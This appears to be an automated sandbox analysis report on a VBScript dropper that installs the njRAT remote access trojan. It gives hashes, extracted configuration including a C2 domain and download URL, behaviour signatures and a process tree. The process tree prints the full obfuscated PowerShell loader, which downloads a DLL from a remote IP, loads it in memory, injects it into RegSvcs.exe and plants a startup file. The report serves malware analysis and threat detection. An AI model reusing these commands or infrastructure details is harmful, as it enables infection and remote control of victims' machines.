Analysis

max time kernel: 152s
max time network: 155s
platform: windows10-2004_x64
resource: win10v2004-20220722-en
resource tags: arch:x64, arch:x86, image:win10v2004-20220722-en, locale:en-us, os:windows10-2004-x64, system
submitted: 11/08/2022, 18:00

Static task: static1
Behavioral task: behavioral1
Sample: 6e4b16840770fe3b078206831254d138.vbs
Resource: win7-20220718-en
General

Target: 6e4b16840770fe3b078206831254d138.vbs
Size: 204KB
MD5: 6e4b16840770fe3b078206831254d138
SHA1: 12da33c6224a67811698b2b6c8fb771357a43638
SHA256: 7d725947a2cc12a85a532d67444856f521749057a8263a10880634642c2276eb
SHA512: a318aaabe1c9f226d2abaf1556a6693d364676e123e7572a7c95ee44b3f28e1c59f8d7d8a6c203a6e05e0de0f6f0394d6b7c52e8851d2f171880f179a9cdba37
Malware Config

Extracted
  URL: http://91.241.19.49/ARTS/dllf3txt

Extracted
  Family: njrat
  Version: 0.7NC
  Botnet: NYAN CAT
  C2: wibnj.duckdns.org:57831
  Mutex: 549d524552
  reg_key: 549d524552
  splitter: @!#&^%$
Signatures

Blocklisted process makes network request (1 IoC)
  flow  pid   Process
  11    4064  powershell.exe

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                              Process
  Key value queried  \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000\Control Panel\International\Geo\Nation  WScript.exe

Drops startup file (1 IoC)
  description   ioc                                                                                                  Process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yu7y6%$!#$%&\()=.vbs  powershell.exe

Suspicious use of SetThreadContext (1 IoC)
  description                          pid   Process         procid_target
  PID 4064 set thread context of 1208  4064  powershell.exe  83

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid   Process
  2300  powershell.exe
  2300  powershell.exe
  4064  powershell.exe
  4064  powershell.exe

Suspicious use of AdjustPrivilegeToken (35 IoCs)
  description                        pid   Process
  Token: SeDebugPrivilege            2300  powershell.exe
  Token: SeDebugPrivilege            4064  powershell.exe
  Token: SeDebugPrivilege            1208  RegSvcs.exe
  Token: 33                          1208  RegSvcs.exe     (16 rows, alternating with the row below)
  Token: SeIncBasePriorityPrivilege  1208  RegSvcs.exe     (16 rows)

Suspicious use of WriteProcessMemory (12 IoCs)
  description                       pid   Process         procid_target
  PID 4372 wrote to memory of 2300  4372  WScript.exe     80   (2 rows)
  PID 2300 wrote to memory of 4064  2300  powershell.exe  82   (2 rows)
  PID 4064 wrote to memory of 1208  4064  powershell.exe  83   (8 rows)
Processes

C:\Windows\System32\WScript.exe (PID 4372)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6e4b16840770fe3b078206831254d138.vbs"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2300, child of 4372)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'JABSAG8AZABhAEMAbwBwAHkAIAA9ACAAJwAlAEsASQB0AE8ATwBQAF⌚⌚⌚AaQBTAE8AVQBsAFEARABqAHYAWABBAE8AZwAlACcAOwBbAEIAeQB0AG⌚⌚⌚AWwBdAF0AIAAkAEQATABMACAAPQAgAFsA⌚⌚⌚wB5AHMAdABlAG0ALgBDAG8AbgB2AG⌚⌚⌚AcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQA⌚⌚⌚wB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAG⌚⌚⌚AdAAuAFcAZQBiAEMAbABpAG⌚⌚⌚AbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQA⌚⌚⌚wB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AOQAxAC4AMgA0ADEALgAxADkALgA0ADkALwBBAFIAVABTAC8AZABsAGwAZgAzAHQAeAB0ACcAKQApADsAWwBTAHkAcwB0AG⌚⌚⌚AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAeABLAHYASwBrAH⌚⌚⌚ATgBaAC4AVQBHAGwAeQBtAHoAVQBnACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBVAEQAcwBTAGkARABiAGIAJwApAC4ASQBuAHYAbwBrAG⌚⌚⌚AKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgAxAFgAWgAvAHcAZQBuAC8AdABzAG⌚⌚⌚AdAAvADkANAAuADkAMQAuADEANAAyAC4AMQA5AC8ALwA6AHAAdAB0AGgAJwAgACwAIAAkAFIAbwBkAGEAQwBvAHAAeQAgACwAIAAnAC8AeQB1ADcAeQA2AC⌚⌚⌚AJAAhACIAIwAkAC⌚⌚⌚AJgAvACgAKQA9ACcAIAApACkA';$OWjuxD = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $iUqm.replace('⌚⌚⌚','U') ) );$OWjuxD = $OWjuxD.replace('%KItOOPUiSOUlQDjvXAOg%', 'C:\Users\Admin\AppData\Local\Temp\6e4b16840770fe3b078206831254d138.vbs');powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4064, child of 2300)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "$RodaCopy = 'C:\Users\Admin\AppData\Local\Temp\6e4b16840770fe3b078206831254d138.vbs';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://91.241.19.49/ARTS/dllf3txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('xKvKkuNZ.UGlymzUg').GetMethod('UDsSiDbb').Invoke($null, [object[]] ('txt.1XZ/wen/tset/94.91.142.19//:ptth' , $RodaCopy , '/yu7y6%$!"#$%&/()=' ))"
      - Blocklisted process makes network request
      - Drops startup file
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (PID 1208, child of 4064)
        Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads

File 1
  Filesize: 3KB
  MD5: f41839a3fe2888c8b3050197bc9a0a05
  SHA1: 0798941aaf7a53a11ea9ed589752890aee069729
  SHA256: 224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
  SHA512: 2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

File 2
  Filesize: 64B
  MD5: 5caad758326454b5788ec35315c4c304
  SHA1: 3aef8dba8042662a7fcf97e51047dc636b4d4724
  SHA256: 83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
  SHA512: 4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693